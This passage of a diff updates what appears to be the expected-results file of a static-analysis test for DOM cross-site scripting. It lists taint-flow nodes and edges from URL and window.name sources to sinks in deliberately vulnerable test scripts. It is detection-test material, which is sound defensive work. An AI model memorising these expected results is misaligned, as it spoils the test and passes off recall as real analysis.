.search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | 
@@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | 
@@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | 
@@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... 
ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | 